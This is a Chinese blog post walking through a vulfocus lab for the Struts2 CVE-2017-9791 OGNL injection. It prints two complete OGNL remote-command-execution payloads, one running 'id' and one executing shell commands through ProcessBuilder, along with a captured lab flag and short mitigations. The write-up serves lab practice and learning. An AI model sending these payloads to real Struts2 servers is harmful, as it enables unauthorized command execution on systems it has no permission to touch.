• vulfocus——struts2-cve_2017_9791


    描述

    Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

    复现

    1.打开靶场环境

    2.访问存在漏洞的路径 /integration/saveGangster.action 

    3.输入表达式${1+2},提交后,发现运算在后台被执行(下面两个框随便填写)

     

    4. 大佬构建的命令执行pyload,执行命令为id

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

     

    5.把id换成pwd,查看当前目录,发现当前目录是tmp

     

    6. 再换成命令ls,然后报错了,在里面看到一串字符,想试试看,是不是flag,结果真的对了

     

    7.将payload进行url转换,抓包然后替换,再发送,就得到flag了

    大佬构造的payload:

    %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

    flag-{bmh8d5b403a-e292-48e8-875a-6a76e45e3792}

    8.我们还可以使用工具来获取flag

     

    漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)将直接传递原始值改为使用资源键

  • 相关阅读:
    【Tomcat优化篇】如何让你的Tomcat性能更加优越
    UNext:基于 MLP 的快速医学图像分割网络
    Small Pipefish
    第6章 - 多无人车系统的协同控制 --> 无人车运动原理
    Huggingface开源模型使用学习
    瞎琢磨i之 原生sql动态查询实现
    Git 常用命令
    [2023.09.18]: Rust中类型转换在错误处理中的应用解析
    Java之泛型系列--构造方法使用泛型(有示例)
    创建scala项目并增加新的object试运行
  • 原文地址:https://blog.csdn.net/m0_62063669/article/details/126708970